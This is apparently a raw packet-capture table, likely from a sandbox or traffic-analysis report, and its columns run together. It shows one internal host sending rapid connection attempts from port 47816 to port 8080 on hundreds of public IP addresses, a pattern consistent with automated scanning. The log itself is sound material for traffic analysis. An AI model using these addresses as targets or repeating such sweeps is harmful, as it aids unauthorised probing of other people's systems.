                                              Nov 23, 2023 05:14:51.041677952 CET478168080192.168.2.1494.206.140.142
                                              Nov 23, 2023 05:14:51.041682959 CET478168080192.168.2.1462.145.118.108
                                              Nov 23, 2023 05:14:51.041686058 CET478168080192.168.2.1494.222.13.201
                                              Nov 23, 2023 05:14:51.041687012 CET478168080192.168.2.1485.220.19.250
                                              Nov 23, 2023 05:14:51.041690111 CET478168080192.168.2.1431.214.98.34
                                              Nov 23, 2023 05:14:51.041703939 CET478168080192.168.2.1431.49.18.126
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1494.250.235.221
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1495.45.89.166
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1462.25.56.235
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1495.99.115.83
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1494.160.200.162
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1462.134.104.205
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1494.155.25.114
                                              Nov 23, 2023 05:14:51.041709900 CET478168080192.168.2.1462.148.98.70
                                              Nov 23, 2023 05:14:51.041713953 CET478168080192.168.2.1495.180.104.247
                                              Nov 23, 2023 05:14:51.041713953 CET478168080192.168.2.1495.143.232.108
                                              Nov 23, 2023 05:14:51.041718960 CET478168080192.168.2.1431.164.58.6
                                              Nov 23, 2023 05:14:51.041721106 CET478168080192.168.2.1495.227.228.121
                                              Nov 23, 2023 05:14:51.041731119 CET478168080192.168.2.1431.212.191.174
                                              Nov 23, 2023 05:14:51.041738033 CET478168080192.168.2.1462.68.47.67
                                              Nov 23, 2023 05:14:51.041742086 CET478168080192.168.2.1485.3.2.150
                                              Nov 23, 2023 05:14:51.041742086 CET478168080192.168.2.1431.0.108.108
                                              Nov 23, 2023 05:14:51.041743040 CET478168080192.168.2.1462.116.51.211
                                              Nov 23, 2023 05:14:51.041743040 CET478168080192.168.2.1462.123.102.196
                                              Nov 23, 2023 05:14:51.041743040 CET478168080192.168.2.1485.235.188.109
                                              Nov 23, 2023 05:14:51.041743040 CET478168080192.168.2.1495.35.54.143
                                              Nov 23, 2023 05:14:51.041743040 CET478168080192.168.2.1494.29.180.72
                                              Nov 23, 2023 05:14:51.041743040 CET478168080192.168.2.1485.55.197.68
                                              Nov 23, 2023 05:14:51.041743040 CET478168080192.168.2.1485.218.57.0
                                              Nov 23, 2023 05:14:51.041757107 CET478168080192.168.2.1485.98.175.219
                                              Nov 23, 2023 05:14:51.041757107 CET478168080192.168.2.1462.107.67.171
                                              Nov 23, 2023 05:14:51.041762114 CET478168080192.168.2.1431.22.198.57
                                              Nov 23, 2023 05:14:51.041775942 CET478168080192.168.2.1462.47.1.152
                                              Nov 23, 2023 05:14:51.041775942 CET478168080192.168.2.1485.72.114.192
                                              Nov 23, 2023 05:14:51.041785002 CET478168080192.168.2.1462.245.153.28
                                              Nov 23, 2023 05:14:51.041790009 CET478168080192.168.2.1462.132.164.90
                                              Nov 23, 2023 05:14:51.041793108 CET478168080192.168.2.1494.149.254.214
                                              Nov 23, 2023 05:14:51.041793108 CET478168080192.168.2.1431.238.107.84
                                              Nov 23, 2023 05:14:51.041806936 CET478168080192.168.2.1495.171.239.130
                                              Nov 23, 2023 05:14:51.041809082 CET478168080192.168.2.1462.37.252.19
                                              Nov 23, 2023 05:14:51.041816950 CET478168080192.168.2.1494.87.70.185
                                              Nov 23, 2023 05:14:51.041835070 CET478168080192.168.2.1485.135.218.201
                                              Nov 23, 2023 05:14:51.041841984 CET478168080192.168.2.1431.156.179.165
                                              Nov 23, 2023 05:14:51.041841984 CET478168080192.168.2.1431.41.39.6
                                              Nov 23, 2023 05:14:51.041843891 CET478168080192.168.2.1485.176.86.38
                                              Nov 23, 2023 05:14:51.041845083 CET478168080192.168.2.1495.36.71.171
                                              Nov 23, 2023 05:14:51.041851044 CET478168080192.168.2.1462.37.213.205
                                              Nov 23, 2023 05:14:51.041853905 CET478168080192.168.2.1485.191.176.198
                                              Nov 23, 2023 05:14:51.041862965 CET478168080192.168.2.1462.124.251.205
                                              Nov 23, 2023 05:14:51.041872978 CET478168080192.168.2.1431.89.102.118
                                              Nov 23, 2023 05:14:51.041873932 CET478168080192.168.2.1485.214.34.197
                                              Nov 23, 2023 05:14:51.041882038 CET478168080192.168.2.1462.136.230.184
                                              Nov 23, 2023 05:14:51.041891098 CET478168080192.168.2.1431.236.191.188
                                              Nov 23, 2023 05:14:51.041894913 CET478168080192.168.2.1485.215.84.92
                                              Nov 23, 2023 05:14:51.041903973 CET478168080192.168.2.1462.175.161.102
                                              Nov 23, 2023 05:14:51.041907072 CET478168080192.168.2.1485.197.181.2
                                              Nov 23, 2023 05:14:51.041907072 CET478168080192.168.2.1431.24.59.209
                                              Nov 23, 2023 05:14:51.041920900 CET478168080192.168.2.1495.235.61.113
                                              Nov 23, 2023 05:14:51.041923046 CET478168080192.168.2.1431.53.209.113
                                              Nov 23, 2023 05:14:51.041929007 CET478168080192.168.2.1494.227.61.199
                                              Nov 23, 2023 05:14:51.041939020 CET478168080192.168.2.1431.123.103.81
                                              Nov 23, 2023 05:14:51.041948080 CET478168080192.168.2.1462.188.242.134
                                              Nov 23, 2023 05:14:51.041956902 CET478168080192.168.2.1431.239.80.135
                                              Nov 23, 2023 05:14:51.041963100 CET478168080192.168.2.1485.96.166.181
                                              Nov 23, 2023 05:14:51.041975021 CET478168080192.168.2.1431.87.230.211
                                              Nov 23, 2023 05:14:51.041984081 CET478168080192.168.2.1462.194.188.130
                                              Nov 23, 2023 05:14:51.041994095 CET478168080192.168.2.1462.135.122.1
                                              Nov 23, 2023 05:14:51.041999102 CET478168080192.168.2.1495.60.105.237
                                              Nov 23, 2023 05:14:51.041999102 CET478168080192.168.2.1494.77.37.228
                                              Nov 23, 2023 05:14:51.042002916 CET478168080192.168.2.1462.133.245.227
                                              Nov 23, 2023 05:14:51.042013884 CET478168080192.168.2.1462.94.74.9
                                              Nov 23, 2023 05:14:51.042020082 CET478168080192.168.2.1494.87.118.253
                                              Nov 23, 2023 05:14:51.042022943 CET478168080192.168.2.1462.46.222.145
                                              Nov 23, 2023 05:14:51.042031050 CET478168080192.168.2.1485.169.110.29
                                              Nov 23, 2023 05:14:51.042031050 CET478168080192.168.2.1494.5.251.155
                                              Nov 23, 2023 05:14:51.042049885 CET478168080192.168.2.1494.224.54.33
                                              Nov 23, 2023 05:14:51.042053938 CET478168080192.168.2.1495.33.58.71
                                              Nov 23, 2023 05:14:51.042053938 CET478168080192.168.2.1431.163.95.52
                                              Nov 23, 2023 05:14:51.042056084 CET478168080192.168.2.1494.60.201.181
                                              Nov 23, 2023 05:14:51.042063951 CET478168080192.168.2.1485.159.72.246
                                              Nov 23, 2023 05:14:51.042074919 CET478168080192.168.2.1462.127.238.69
                                              Nov 23, 2023 05:14:51.042074919 CET478168080192.168.2.1462.36.112.138
                                              Nov 23, 2023 05:14:51.042083979 CET478168080192.168.2.1494.243.113.212
                                              Nov 23, 2023 05:14:51.042087078 CET478168080192.168.2.1494.63.170.55
                                              Nov 23, 2023 05:14:51.042087078 CET478168080192.168.2.1462.106.214.126
                                              Nov 23, 2023 05:14:51.042092085 CET478168080192.168.2.1431.25.6.160
                                              Nov 23, 2023 05:14:51.042097092 CET478168080192.168.2.1462.200.178.16
                                              Nov 23, 2023 05:14:51.042114019 CET478168080192.168.2.1494.253.33.14
                                              Nov 23, 2023 05:14:51.042119026 CET478168080192.168.2.1431.9.146.184
                                              Nov 23, 2023 05:14:51.042119980 CET478168080192.168.2.1485.32.76.247
                                              Nov 23, 2023 05:14:51.042123079 CET478168080192.168.2.1462.17.119.225
                                              Nov 23, 2023 05:14:51.042129993 CET478168080192.168.2.1485.225.110.144
                                              Nov 23, 2023 05:14:51.042135000 CET478168080192.168.2.1431.114.51.0
                                              Nov 23, 2023 05:14:51.042140007 CET478168080192.168.2.1462.163.178.247
                                              Nov 23, 2023 05:14:51.042140007 CET478168080192.168.2.1494.39.11.101
                                              Nov 23, 2023 05:14:51.042145014 CET478168080192.168.2.1494.186.233.233
                                              Nov 23, 2023 05:14:51.042152882 CET478168080192.168.2.1495.213.98.251
                                              Nov 23, 2023 05:14:51.042160034 CET478168080192.168.2.1485.100.233.126
                                              Nov 23, 2023 05:14:51.042164087 CET478168080192.168.2.1494.197.23.82
                                              Nov 23, 2023 05:14:51.042167902 CET478168080192.168.2.1485.185.197.11
                                              Nov 23, 2023 05:14:51.042174101 CET478168080192.168.2.1494.108.118.250
                                              Nov 23, 2023 05:14:51.042186022 CET478168080192.168.2.1462.121.207.58
                                              Nov 23, 2023 05:14:51.042188883 CET478168080192.168.2.1431.195.6.78
                                              Nov 23, 2023 05:14:51.042196035 CET478168080192.168.2.1431.122.6.183
                                              Nov 23, 2023 05:14:51.042205095 CET478168080192.168.2.1431.241.71.231
                                              Nov 23, 2023 05:14:51.042210102 CET478168080192.168.2.1431.240.59.93
                                              Nov 23, 2023 05:14:51.042210102 CET478168080192.168.2.1431.5.162.21
                                              Nov 23, 2023 05:14:51.042222023 CET478168080192.168.2.1462.234.23.65
                                              Nov 23, 2023 05:14:51.042224884 CET478168080192.168.2.1494.254.155.10
                                              Nov 23, 2023 05:14:51.042228937 CET478168080192.168.2.1485.114.177.22
                                              Nov 23, 2023 05:14:51.042233944 CET478168080192.168.2.1494.201.187.64
                                              Nov 23, 2023 05:14:51.042241096 CET478168080192.168.2.1494.197.147.121
                                              Nov 23, 2023 05:14:51.042244911 CET478168080192.168.2.1462.66.110.36
                                              Nov 23, 2023 05:14:51.042258024 CET478168080192.168.2.1431.165.197.252
                                              Nov 23, 2023 05:14:51.042258024 CET478168080192.168.2.1494.217.74.98
                                              Nov 23, 2023 05:14:51.042265892 CET478168080192.168.2.1485.50.214.76
                                              Nov 23, 2023 05:14:51.042268038 CET478168080192.168.2.1431.155.127.66
                                              Nov 23, 2023 05:14:51.042273998 CET478168080192.168.2.1485.49.167.50
                                              Nov 23, 2023 05:14:51.042279005 CET478168080192.168.2.1485.74.197.185
                                              Nov 23, 2023 05:14:51.042290926 CET478168080192.168.2.1485.177.108.170
                                              Nov 23, 2023 05:14:51.042296886 CET478168080192.168.2.1494.191.3.63
                                              Nov 23, 2023 05:14:51.042304039 CET478168080192.168.2.1494.11.28.2
                                              Nov 23, 2023 05:14:51.042313099 CET478168080192.168.2.1495.219.233.173
                                              Nov 23, 2023 05:14:51.042313099 CET478168080192.168.2.1431.96.119.50
                                              Nov 23, 2023 05:14:51.042330980 CET478168080192.168.2.1494.191.108.234
                                              Nov 23, 2023 05:14:51.042331934 CET478168080192.168.2.1485.70.242.27
                                              Nov 23, 2023 05:14:51.042341948 CET478168080192.168.2.1485.251.235.134
                                              Nov 23, 2023 05:14:51.042345047 CET478168080192.168.2.1485.184.228.79
                                              Nov 23, 2023 05:14:51.042354107 CET478168080192.168.2.1495.170.184.165
                                              Nov 23, 2023 05:14:51.042359114 CET478168080192.168.2.1485.134.99.236
                                              Nov 23, 2023 05:14:51.042367935 CET478168080192.168.2.1494.10.253.108
                                              Nov 23, 2023 05:14:51.042383909 CET478168080192.168.2.1494.126.142.82
                                              Nov 23, 2023 05:14:51.042387009 CET478168080192.168.2.1431.219.126.176
                                              Nov 23, 2023 05:14:51.042392015 CET478168080192.168.2.1431.173.183.124
                                              Nov 23, 2023 05:14:51.042392969 CET478168080192.168.2.1495.189.125.85
                                              Nov 23, 2023 05:14:51.042397022 CET478168080192.168.2.1494.183.227.163
                                              Nov 23, 2023 05:14:51.042403936 CET478168080192.168.2.1462.78.158.101
                                              Nov 23, 2023 05:14:51.042409897 CET478168080192.168.2.1431.49.112.18
                                              Nov 23, 2023 05:14:51.042418003 CET478168080192.168.2.1462.190.127.45
                                              Nov 23, 2023 05:14:51.042419910 CET478168080192.168.2.1495.60.9.169
                                              Nov 23, 2023 05:14:51.042431116 CET478168080192.168.2.1462.8.246.29
                                              Nov 23, 2023 05:14:51.042438984 CET478168080192.168.2.1494.81.47.144
                                              Nov 23, 2023 05:14:51.042442083 CET478168080192.168.2.1495.215.15.112
                                              Nov 23, 2023 05:14:51.042450905 CET478168080192.168.2.1431.24.70.81
                                              Nov 23, 2023 05:14:51.042454958 CET478168080192.168.2.1431.128.93.219
                                              Nov 23, 2023 05:14:51.042469025 CET478168080192.168.2.1431.110.56.47
                                              Nov 23, 2023 05:14:51.042469978 CET478168080192.168.2.1462.204.243.184
                                              Nov 23, 2023 05:14:51.042474985 CET478168080192.168.2.1485.40.247.193
                                              Nov 23, 2023 05:14:51.042475939 CET478168080192.168.2.1462.212.232.107
                                              Nov 23, 2023 05:14:51.042491913 CET478168080192.168.2.1462.103.1.236
                                              Nov 23, 2023 05:14:51.042491913 CET478168080192.168.2.1495.138.160.216
                                              Nov 23, 2023 05:14:51.042505980 CET478168080192.168.2.1462.179.242.189
                                              Nov 23, 2023 05:14:51.042510986 CET478168080192.168.2.1495.33.5.161
                                              Nov 23, 2023 05:14:51.042515039 CET478168080192.168.2.1495.194.157.180
                                              Nov 23, 2023 05:14:51.042515993 CET478168080192.168.2.1462.72.148.133
                                              Nov 23, 2023 05:14:51.042515993 CET478168080192.168.2.1462.38.113.70
                                              Nov 23, 2023 05:14:51.042525053 CET478168080192.168.2.1495.60.34.176
                                              Nov 23, 2023 05:14:51.042531013 CET478168080192.168.2.1494.107.183.75
                                              Nov 23, 2023 05:14:51.042531967 CET478168080192.168.2.1431.219.74.219
                                              Nov 23, 2023 05:14:51.042546988 CET478168080192.168.2.1495.142.133.119
                                              Nov 23, 2023 05:14:51.042546988 CET478168080192.168.2.1431.79.211.223
                                              Nov 23, 2023 05:14:51.042562962 CET478168080192.168.2.1431.131.36.250
                                              Nov 23, 2023 05:14:51.042563915 CET478168080192.168.2.1462.223.80.135
                                              Nov 23, 2023 05:14:51.042574883 CET478168080192.168.2.1494.156.107.182
                                              Nov 23, 2023 05:14:51.042581081 CET478168080192.168.2.1495.82.247.22
                                              Nov 23, 2023 05:14:51.042581081 CET478168080192.168.2.1494.34.193.237
                                              Nov 23, 2023 05:14:51.042582035 CET478168080192.168.2.1462.173.87.129
                                              Nov 23, 2023 05:14:51.042582035 CET478168080192.168.2.1431.228.85.107
                                              Nov 23, 2023 05:14:51.042582035 CET478168080192.168.2.1431.85.74.28
                                              Nov 23, 2023 05:14:51.042597055 CET478168080192.168.2.1495.85.35.209
                                              Nov 23, 2023 05:14:51.042601109 CET478168080192.168.2.1431.169.225.78
                                              Nov 23, 2023 05:14:51.042608976 CET478168080192.168.2.1485.13.223.65
                                              Nov 23, 2023 05:14:51.042613983 CET478168080192.168.2.1495.134.243.144
                                              Nov 23, 2023 05:14:51.042615891 CET478168080192.168.2.1431.66.14.157
                                              Nov 23, 2023 05:14:51.042628050 CET478168080192.168.2.1495.254.148.13
                                              Nov 23, 2023 05:14:51.042628050 CET478168080192.168.2.1494.110.6.247
                                              Nov 23, 2023 05:14:51.042632103 CET478168080192.168.2.1495.103.24.173
                                              Nov 23, 2023 05:14:51.042634010 CET478168080192.168.2.1431.5.205.32
                                              Nov 23, 2023 05:14:51.042634010 CET478168080192.168.2.1431.58.125.34
                                              Nov 23, 2023 05:14:51.042645931 CET478168080192.168.2.1495.60.36.193
                                              Nov 23, 2023 05:14:51.042645931 CET478168080192.168.2.1495.108.237.8
                                              Nov 23, 2023 05:14:51.042659998 CET478168080192.168.2.1431.244.241.230
                                              Nov 23, 2023 05:14:51.042660952 CET478168080192.168.2.1431.160.199.235
                                              Nov 23, 2023 05:14:51.042673111 CET478168080192.168.2.1494.1.48.87
                                              Nov 23, 2023 05:14:51.042675972 CET478168080192.168.2.1495.100.68.170
                                              Nov 23, 2023 05:14:51.042684078 CET478168080192.168.2.1495.203.113.201
                                              Nov 23, 2023 05:14:51.042687893 CET478168080192.168.2.1485.207.180.77
                                              Nov 23, 2023 05:14:51.042690992 CET478168080192.168.2.1494.245.251.156
                                              Nov 23, 2023 05:14:51.042702913 CET478168080192.168.2.1462.215.202.254
                                              Nov 23, 2023 05:14:51.042709112 CET478168080192.168.2.1495.95.40.69
                                              Nov 23, 2023 05:14:51.042710066 CET478168080192.168.2.1494.187.0.166
                                              Nov 23, 2023 05:14:51.042711020 CET478168080192.168.2.1462.130.238.34
                                              Nov 23, 2023 05:14:51.042725086 CET478168080192.168.2.1494.213.167.41
                                              Nov 23, 2023 05:14:51.042727947 CET478168080192.168.2.1431.190.186.188
                                              Nov 23, 2023 05:14:51.042727947 CET478168080192.168.2.1431.100.102.156
                                              Nov 23, 2023 05:14:51.042727947 CET478168080192.168.2.1462.188.144.239
                                              Nov 23, 2023 05:14:51.042738914 CET478168080192.168.2.1431.83.212.247
                                              Nov 23, 2023 05:14:51.042747021 CET478168080192.168.2.1494.80.228.120
                                              Nov 23, 2023 05:14:51.042757988 CET478168080192.168.2.1462.108.174.129
                                              Nov 23, 2023 05:14:51.042759895 CET478168080192.168.2.1494.49.208.25
                                              Nov 23, 2023 05:14:51.042762041 CET478168080192.168.2.1495.124.138.198
                                              Nov 23, 2023 05:14:51.042769909 CET478168080192.168.2.1495.46.117.137
                                              Nov 23, 2023 05:14:51.042778015 CET478168080192.168.2.1485.114.114.155
                                              Nov 23, 2023 05:14:51.042795897 CET478168080192.168.2.1485.33.103.165
                                              Nov 23, 2023 05:14:51.042798996 CET478168080192.168.2.1485.80.138.82
                                              Nov 23, 2023 05:14:51.042804003 CET478168080192.168.2.1495.187.195.201
                                              Nov 23, 2023 05:14:51.042805910 CET478168080192.168.2.1431.76.14.141
                                              Nov 23, 2023 05:14:51.042814016 CET478168080192.168.2.1494.61.191.53
                                              Nov 23, 2023 05:14:51.042820930 CET478168080192.168.2.1462.61.87.2
                                              Nov 23, 2023 05:14:51.042840958 CET478168080192.168.2.1494.166.42.17
                                              Nov 23, 2023 05:14:51.042840958 CET478168080192.168.2.1462.68.182.1
                                              Nov 23, 2023 05:14:51.042841911 CET478168080192.168.2.1462.198.221.124
                                              Nov 23, 2023 05:14:51.042843103 CET478168080192.168.2.1495.242.44.164
                                              Nov 23, 2023 05:14:51.042845011 CET478168080192.168.2.1431.52.90.104
                                              Nov 23, 2023 05:14:51.042848110 CET478168080192.168.2.1494.33.138.218
                                              Nov 23, 2023 05:14:51.042848110 CET478168080192.168.2.1495.81.144.203
                                              Nov 23, 2023 05:14:51.042856932 CET478168080192.168.2.1494.187.218.45
                                              Nov 23, 2023 05:14:51.042867899 CET478168080192.168.2.1462.98.61.190
                                              Nov 23, 2023 05:14:51.042867899 CET478168080192.168.2.1462.215.88.254
                                              Nov 23, 2023 05:14:51.042876959 CET478168080192.168.2.1495.70.87.38
                                              Nov 23, 2023 05:14:51.042876959 CET478168080192.168.2.1431.215.108.152
                                              Nov 23, 2023 05:14:51.042877913 CET478168080192.168.2.1462.119.168.178
                                              Nov 23, 2023 05:14:51.042881966 CET478168080192.168.2.1495.144.244.161
                                              Nov 23, 2023 05:14:51.042893887 CET478168080192.168.2.1494.154.98.19
                                              Nov 23, 2023 05:14:51.042895079 CET478168080192.168.2.1485.58.236.244
                                              Nov 23, 2023 05:14:51.042912006 CET478168080192.168.2.1495.166.156.99
                                              Nov 23, 2023 05:14:51.042912006 CET478168080192.168.2.1485.168.182.231
                                              Nov 23, 2023 05:14:51.042920113 CET478168080192.168.2.1462.5.242.239
                                              Nov 23, 2023 05:14:51.042924881 CET478168080192.168.2.1495.137.217.223
                                              Nov 23, 2023 05:14:51.042932034 CET478168080192.168.2.1494.73.210.23
                                              Nov 23, 2023 05:14:51.042942047 CET478168080192.168.2.1462.238.62.103
                                              Nov 23, 2023 05:14:51.042942047 CET478168080192.168.2.1495.253.246.171
                                              Nov 23, 2023 05:14:51.042946100 CET478168080192.168.2.1494.223.222.141
                                              Nov 23, 2023 05:14:51.042962074 CET478168080192.168.2.1485.133.15.75
                                              Nov 23, 2023 05:14:51.042962074 CET478168080192.168.2.1494.242.146.106
                                              Nov 23, 2023 05:14:51.042968035 CET478168080192.168.2.1431.244.2.87
                                              Nov 23, 2023 05:14:51.042968035 CET478168080192.168.2.1431.17.165.253
                                              Nov 23, 2023 05:14:51.042979956 CET478168080192.168.2.1494.25.244.29
                                              Nov 23, 2023 05:14:51.042985916 CET478168080192.168.2.1431.195.181.49
                                              Nov 23, 2023 05:14:51.042988062 CET478168080192.168.2.1462.213.8.130
                                              Nov 23, 2023 05:14:51.042995930 CET478168080192.168.2.1494.149.241.19
                                              Nov 23, 2023 05:14:51.042995930 CET478168080192.168.2.1495.140.207.220
                                              Nov 23, 2023 05:14:51.042995930 CET478168080192.168.2.1431.255.150.218
                                              Nov 23, 2023 05:14:51.042998075 CET478168080192.168.2.1431.102.30.110
                                              Nov 23, 2023 05:14:51.043006897 CET478168080192.168.2.1494.53.175.251
                                              Nov 23, 2023 05:14:51.043014050 CET478168080192.168.2.1431.132.159.56
                                              Nov 23, 2023 05:14:51.043018103 CET478168080192.168.2.1495.89.166.77
                                              Nov 23, 2023 05:14:51.043021917 CET478168080192.168.2.1462.107.14.58
                                              Nov 23, 2023 05:14:51.043028116 CET478168080192.168.2.1495.199.161.205
                                              Nov 23, 2023 05:14:51.043035030 CET478168080192.168.2.1431.1.146.230
                                              Nov 23, 2023 05:14:51.043035030 CET478168080192.168.2.1462.155.146.127
                                              Nov 23, 2023 05:14:51.043045044 CET478168080192.168.2.1495.249.214.165
                                              Nov 23, 2023 05:14:51.043054104 CET478168080192.168.2.1485.30.234.137
                                              Nov 23, 2023 05:14:51.043059111 CET478168080192.168.2.1462.138.228.69
                                              Nov 23, 2023 05:14:51.043068886 CET478168080192.168.2.1485.120.42.140
                                              Nov 23, 2023 05:14:51.043083906 CET478168080192.168.2.1494.226.180.103
                                              Nov 23, 2023 05:14:51.043088913 CET478168080192.168.2.1495.86.236.81
                                              Nov 23, 2023 05:14:51.043092966 CET478168080192.168.2.1485.80.3.183
                                              Nov 23, 2023 05:14:51.043092966 CET478168080192.168.2.1462.234.17.36
                                              Nov 23, 2023 05:14:51.043106079 CET478168080192.168.2.1494.137.215.35
                                              Nov 23, 2023 05:14:51.043107033 CET478168080192.168.2.1431.207.49.247
                                              Nov 23, 2023 05:14:51.043109894 CET478168080192.168.2.1495.186.101.94
                                              Nov 23, 2023 05:14:51.043117046 CET478168080192.168.2.1495.130.189.19
                                              Nov 23, 2023 05:14:51.043133020 CET478168080192.168.2.1494.60.190.222
                                              Nov 23, 2023 05:14:51.043138981 CET478168080192.168.2.1495.27.38.33
                                              Nov 23, 2023 05:14:51.043142080 CET478168080192.168.2.1431.228.142.96
                                              Nov 23, 2023 05:14:51.043144941 CET478168080192.168.2.1431.140.80.15
                                              Nov 23, 2023 05:14:51.043148994 CET478168080192.168.2.1485.176.2.6
                                              Nov 23, 2023 05:14:51.043165922 CET478168080192.168.2.1494.8.214.220
                                              Nov 23, 2023 05:14:51.043170929 CET478168080192.168.2.1494.158.31.39
                                              Nov 23, 2023 05:14:51.043175936 CET478168080192.168.2.1495.7.118.202
                                              Nov 23, 2023 05:14:51.043176889 CET478168080192.168.2.1462.163.135.253
                                              Nov 23, 2023 05:14:51.043176889 CET478168080192.168.2.1494.147.166.129
                                              Nov 23, 2023 05:14:51.043184042 CET478168080192.168.2.1495.180.10.56
                                              Nov 23, 2023 05:14:51.043186903 CET478168080192.168.2.1485.100.208.113
                                              Nov 23, 2023 05:14:51.043190956 CET478168080192.168.2.1485.66.125.50
                                              Nov 23, 2023 05:14:51.043190956 CET478168080192.168.2.1462.211.61.124
                                              Nov 23, 2023 05:14:51.043195009 CET478168080192.168.2.1462.71.250.188
                                              Nov 23, 2023 05:14:51.043195009 CET478168080192.168.2.1485.125.216.84
                                              Nov 23, 2023 05:14:51.043198109 CET478168080192.168.2.1494.242.172.30
                                              Nov 23, 2023 05:14:51.043198109 CET478168080192.168.2.1494.223.118.50
                                              Nov 23, 2023 05:14:51.043200016 CET478168080192.168.2.1462.179.194.56
                                              Nov 23, 2023 05:14:51.043204069 CET478168080192.168.2.1431.140.163.179
                                              Nov 23, 2023 05:14:51.043204069 CET478168080192.168.2.1462.130.218.9
                                              Nov 23, 2023 05:14:51.043211937 CET478168080192.168.2.1462.100.199.185
                                              Nov 23, 2023 05:14:51.043214083 CET478168080192.168.2.1495.9.130.61
                                              Nov 23, 2023 05:14:51.043225050 CET478168080192.168.2.1462.53.204.200
                                              Nov 23, 2023 05:14:51.043234110 CET478168080192.168.2.1462.102.194.85
                                              Nov 23, 2023 05:14:51.043240070 CET478168080192.168.2.1495.201.139.91
                                              Nov 23, 2023 05:14:51.043247938 CET478168080192.168.2.1431.54.80.141
                                              Nov 23, 2023 05:14:51.043247938 CET478168080192.168.2.1494.115.81.3
                                              Nov 23, 2023 05:14:51.043256998 CET478168080192.168.2.1495.80.225.73
                                              Nov 23, 2023 05:14:51.043258905 CET478168080192.168.2.1431.254.103.200
                                              Nov 23, 2023 05:14:51.043272018 CET478168080192.168.2.1495.129.149.166
                                              Nov 23, 2023 05:14:51.043277979 CET478168080192.168.2.1494.76.2.56
                                              Nov 23, 2023 05:14:51.043279886 CET478168080192.168.2.1494.53.93.72
                                              Nov 23, 2023 05:14:51.043279886 CET478168080192.168.2.1462.253.223.189
                                              Nov 23, 2023 05:14:51.043292046 CET478168080192.168.2.1495.135.136.180
                                              Nov 23, 2023 05:14:51.043298960 CET478168080192.168.2.1462.85.16.137
                                              Nov 23, 2023 05:14:51.043301105 CET478168080192.168.2.1431.15.47.107
                                              Nov 23, 2023 05:14:51.043308020 CET478168080192.168.2.1462.218.27.133
                                              Nov 23, 2023 05:14:51.043313980 CET478168080192.168.2.1495.82.161.167
                                              Nov 23, 2023 05:14:51.043319941 CET478168080192.168.2.1431.213.34.6
                                              Nov 23, 2023 05:14:51.043329954 CET478168080192.168.2.1485.2.163.21
                                              Nov 23, 2023 05:14:51.043334961 CET478168080192.168.2.1431.38.123.202
                                              Nov 23, 2023 05:14:51.043339968 CET478168080192.168.2.1431.213.203.157
                                              Nov 23, 2023 05:14:51.043348074 CET478168080192.168.2.1495.101.55.71
                                              Nov 23, 2023 05:14:51.043353081 CET478168080192.168.2.1495.116.251.154
                                              Nov 23, 2023 05:14:51.043353081 CET478168080192.168.2.1495.120.222.146
                                              Nov 23, 2023 05:14:51.043368101 CET478168080192.168.2.1431.81.53.66
                                              Nov 23, 2023 05:14:51.043369055 CET478168080192.168.2.1431.69.211.87
                                              Nov 23, 2023 05:14:51.043378115 CET478168080192.168.2.1495.6.158.112
                                              Nov 23, 2023 05:14:51.043382883 CET478168080192.168.2.1462.203.42.155
                                              Nov 23, 2023 05:14:51.043384075 CET478168080192.168.2.1485.153.43.254
                                              Nov 23, 2023 05:14:51.043390989 CET478168080192.168.2.1485.249.12.205
                                              Nov 23, 2023 05:14:51.043400049 CET478168080192.168.2.1485.177.74.170
                                              Nov 23, 2023 05:14:51.043401957 CET478168080192.168.2.1462.144.180.20
                                              Nov 23, 2023 05:14:51.043411016 CET478168080192.168.2.1494.92.196.93
                                              Nov 23, 2023 05:14:51.043415070 CET478168080192.168.2.1485.2.28.192
                                              Nov 23, 2023 05:14:51.043425083 CET478168080192.168.2.1431.212.227.192
                                              Nov 23, 2023 05:14:51.043426991 CET478168080192.168.2.1494.166.168.227
                                              Nov 23, 2023 05:14:51.043433905 CET478168080192.168.2.1485.186.106.69
                                              Nov 23, 2023 05:14:51.043437004 CET478168080192.168.2.1431.162.117.24
                                              Nov 23, 2023 05:14:51.043447018 CET478168080192.168.2.1494.243.221.124
                                              Nov 23, 2023 05:14:51.043452024 CET478168080192.168.2.1485.87.31.15
                                              Nov 23, 2023 05:14:51.043452024 CET478168080192.168.2.1431.221.127.61
                                              Nov 23, 2023 05:14:51.043452024 CET478168080192.168.2.1485.181.8.40
                                              Nov 23, 2023 05:14:51.043463945 CET478168080192.168.2.1462.183.39.100
                                              Nov 23, 2023 05:14:51.043472052 CET478168080192.168.2.1494.134.91.65
                                              Nov 23, 2023 05:14:51.043482065 CET478168080192.168.2.1494.158.241.37
                                              Nov 23, 2023 05:14:51.043486118 CET478168080192.168.2.1485.101.4.71
                                              Nov 23, 2023 05:14:51.043487072 CET478168080192.168.2.1462.198.184.15
                                              Nov 23, 2023 05:14:51.043490887 CET478168080192.168.2.1462.144.140.96
                                              Nov 23, 2023 05:14:51.043490887 CET478168080192.168.2.1485.91.153.159
                                              Nov 23, 2023 05:14:51.043498993 CET478168080192.168.2.1494.25.78.65
                                              Nov 23, 2023 05:14:51.043502092 CET478168080192.168.2.1431.187.13.53
                                              Nov 23, 2023 05:14:51.043508053 CET478168080192.168.2.1431.17.134.26
                                              Nov 23, 2023 05:14:51.043518066 CET478168080192.168.2.1462.211.83.138
                                              Nov 23, 2023 05:14:51.043518066 CET478168080192.168.2.1494.141.150.104
                                              Nov 23, 2023 05:14:51.043520927 CET478168080192.168.2.1431.228.143.104
                                              Nov 23, 2023 05:14:51.043534994 CET478168080192.168.2.1462.217.195.38
                                              Nov 23, 2023 05:14:51.043534994 CET478168080192.168.2.1462.237.83.110
                                              Nov 23, 2023 05:14:51.043540955 CET478168080192.168.2.1494.113.108.121
                                              Nov 23, 2023 05:14:51.043549061 CET478168080192.168.2.1494.25.145.188
                                              Nov 23, 2023 05:14:51.043550014 CET478168080192.168.2.1431.29.116.249
                                              Nov 23, 2023 05:14:51.043557882 CET478168080192.168.2.1494.254.232.82
                                              Nov 23, 2023 05:14:51.043565035 CET478168080192.168.2.1495.204.112.140
                                              Nov 23, 2023 05:14:51.043565035 CET478168080192.168.2.1462.87.102.104
